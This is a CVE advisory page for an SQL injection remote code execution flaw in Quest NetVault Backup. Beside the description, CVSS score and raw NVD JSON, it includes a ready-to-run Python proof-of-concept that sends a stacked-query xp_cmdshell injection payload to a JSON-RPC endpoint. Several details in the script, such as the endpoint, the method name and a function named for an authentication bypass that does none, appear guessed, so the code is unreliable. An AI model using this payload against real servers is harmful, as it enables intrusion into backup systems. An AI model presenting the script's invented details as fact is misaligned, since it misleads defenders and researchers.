Security Vulnerability Report
中文
CVE-2026-9781 CVSS 8.8 HIGH

CVE-2026-9781

Published: 2026-06-25 00:17:48
Last Modified: 2026-06-25 14:23:56

Description

Quest NetVault Backup NVBURASDevice SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Quest NetVault Backup. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of NVBURASDevice JSON-RPC messages. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-27648.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Quest NetVault Backup < 14.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-9781 - Quest NetVault Backup SQL Injection RCE PoC # Vulnerability: SQL Injection in NVBURASDevice JSON-RPC message processing # Reference: ZDI-CAN-27648 / ZDI-26-370 import requests import json import sys TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "target-host" TARGET_PORT = 8443 # Default NetVault Backup port JSONRPC_ENDPOINT = f"https://{TARGET_HOST}:{TARGET_PORT}/jsonrpc/NVBURASDevice" def exploit_sql_injection(injected_payload): """ Exploit SQL injection in NVBURASDevice JSON-RPC handler. The vulnerability exists due to lack of input validation on user-supplied strings used in SQL query construction. """ # Craft malicious JSON-RPC message with SQL injection payload jsonrpc_payload = { "jsonrpc": "2.0", "method": "NVBURASDevice.process", "params": { "deviceName": injected_payload, # Vulnerable parameter "action": "query" }, "id": 1 } headers = { "Content-Type": "application/json", "User-Agent": "NetVault-Backup-Client" } try: response = requests.post( JSONRPC_ENDPOINT, data=json.dumps(jsonrpc_payload), headers=headers, verify=False, timeout=30 ) return response except Exception as e: print(f"[ERROR] Request failed: {e}") return None def bypass_auth_and_exploit(): """ Attempt to bypass authentication and exploit the SQL injection. Authentication mechanism can be bypassed as noted in the advisory. """ # SQL injection payload targeting MSSQL (NETWORK SERVICE context) # Using stacked queries to attempt command execution via xp_cmdshell sqli_payload = ( "' OR 1=1; EXEC xp_cmdshell('whoami'); --" ) print(f"[*] Targeting: {TARGET_HOST}") print(f"[*] Endpoint: {JSONRPC_ENDPOINT}") print(f"[*] Sending SQL injection payload...") response = exploit_sql_injection(sqli_payload) if response and response.status_code == 200: print(f"[+] Response received:") print(response.text) else: print(f"[-] Exploit attempt failed. Status: {response.status_code if response else 'N/A'}") if __name__ == "__main__": bypass_auth_and_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9781", "sourceIdentifier": "[email protected]", "published": "2026-06-25T00:17:48.293", "lastModified": "2026-06-25T14:23:56.107", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quest NetVault Backup NVBURASDevice SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Quest NetVault Backup. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of NVBURASDevice JSON-RPC messages. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-27648."}], "affected": [{"source": "[email protected]", "affectedData": [{"vendor": "Quest", "product": "NetVault Backup", "defaultStatus": "unknown", "versions": [{"version": "14.0.0.19", "status": "affected"}]}]}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "ssvcV203": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "ssvcData": {"timestamp": "2026-06-25T12:49:50.872086Z", "id": "CVE-2026-9781", "options": [{"exploitation": "none"}, {"automatable": "no"}, {"technicalImpact": "total"}], "role": "CISA Coordinator", "version": "2.0.3"}}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://support.quest.com/technical-documents/netvault/14.0.2/release-notes#TOPIC-2338529", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-370/", "source": "[email protected]"}]}}